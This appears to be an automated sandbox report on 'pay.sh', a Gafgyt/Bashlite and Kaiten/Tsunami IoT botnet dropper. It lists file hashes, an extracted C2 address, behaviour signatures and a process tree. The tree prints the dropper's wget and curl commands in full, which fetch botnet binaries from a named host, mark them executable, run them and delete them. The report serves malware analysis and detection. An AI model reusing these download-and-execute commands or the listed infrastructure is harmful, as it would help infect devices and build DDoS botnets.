Analysis

  • max time kernel
    64s
  • max time network
    69s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    22-10-2024 16:06

General

  • Target

    pay.sh

  • Size

    3KB

  • MD5

    cf70ee36f1e9247f2146e4981924d4f4

  • SHA1

    7eabae4200118c4e89979658db6e4d905fe3dae9

  • SHA256

    0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

  • SHA512

    60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Malware Config

Extracted

Family

gafgyt

C2

104.234.24.138:1990

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Detects Kaiten/Tsunami Payload 2 IoCs
  • Detects Kaiten/Tsunami payload 2 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Creates/modifies environment variables
    • Modifies Bash startup script
    PID:698
    • /usr/bin/wget
      wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
      2⤵
      • Writes file to tmp directory
      PID:702
    • /usr/bin/curl
      curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:726
    • /bin/chmod
      chmod +x m3cr0
      2⤵
      • File and Directory Permissions Modification
      PID:733
    • /tmp/m3cr0
      ./m3cr0
      2⤵
      • Executes dropped EXE
      PID:734
    • /bin/rm
      rm -rf m3cr0
      2⤵
      PID:737
    • /bin/rm
      rm -rf m3cr0.1
      2⤵
      PID:739
    • /usr/bin/wget
      wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64
      2⤵
      • Writes file to tmp directory
      PID:740
    • /usr/bin/curl
      curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:750
    • /bin/chmod
      chmod +x zigaarch64
      2⤵
      • File and Directory Permissions Modification
      PID:759
    • /tmp/zigaarch64
      ./zigaarch64
      2⤵
      • Executes dropped EXE
      PID:761
    • /bin/rm
      rm -rf zigaarch64
      2⤵
      PID:763
    • /bin/rm
      rm -rf zigaarch64.1
      2⤵
      PID:765
    • /usr/bin/wget
      wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x
      2⤵
      • Writes file to tmp directory
      PID:766
    • /usr/bin/curl
      curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:778
    • /bin/chmod
      chmod +x x00x
      2⤵
      • File and Directory Permissions Modification
      PID:792
    • /tmp/x00x
      ./x00x
      2⤵
      • Executes dropped EXE
      PID:793
    • /bin/rm
      rm -rf x00x
      2⤵
      PID:795
    • /bin/rm
      rm -rf x00x.1
      2⤵
      PID:796
    • /usr/bin/wget
      wget http://floodernetwork111.accesscam.org:8089/bash.sh
      2⤵
      • Writes file to tmp directory
      PID:797
    • /usr/bin/curl
      curl -O http://floodernetwork111.accesscam.org:8089/bash.sh
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:799
    • /bin/rm
      rm -rf bash.sh.1
      2⤵
      PID:802
    • /bin/bash
      bash bash.sh
      2⤵
      PID:801
      • /usr/bin/wget
        wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0
        3⤵
        • Writes file to tmp directory
        PID:803
      • /usr/bin/curl
        curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0
        3⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:804
      • /bin/chmod
        chmod +x m3cr0
        3⤵
        • File and Directory Permissions Modification
        PID:806
      • /tmp/m3cr0
        ./m3cr0
        3⤵
        • Executes dropped EXE
        PID:807
      • /bin/rm
        rm -rf m3cr0
        3⤵
        PID:809
      • /bin/rm
        rm -rf m3cr0.1
        3⤵
        PID:810
      • /bin/sleep
        sleep 6000
        3⤵
        PID:811

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/bash.sh

    Filesize

    236B

    MD5

    8bbe815474c7d3ed318e958c05e1c95b

    SHA1

    36235a707a29d27b01570ef8c973c522f563c15c

    SHA256

    469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b

    SHA512

    137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f

  • /tmp/m3cr0

    Filesize

    983KB

    MD5

    75c00b238bd8105414cbb5d08601ca1a

    SHA1

    2a5e59555f348bfd9fa9fc4e3e04338ee4e74576

    SHA256

    edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361

    SHA512

    a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5

  • /tmp/x00x

    Filesize

    985KB

    MD5

    f042a9131a6d06671e98c1ed1f8d80a8

    SHA1

    dd97fac87e8d4a973dc4867524908f3384916f27

    SHA256

    a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c

    SHA512

    629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe

  • /tmp/zigaarch64

    Filesize

    73KB

    MD5

    48ea3c3566c796e4f74e8e3d6df15cd3

    SHA1

    b1ef1574ced09471c26a4c749d5a4ab5ba7942cd

    SHA256

    79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a

    SHA512

    cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd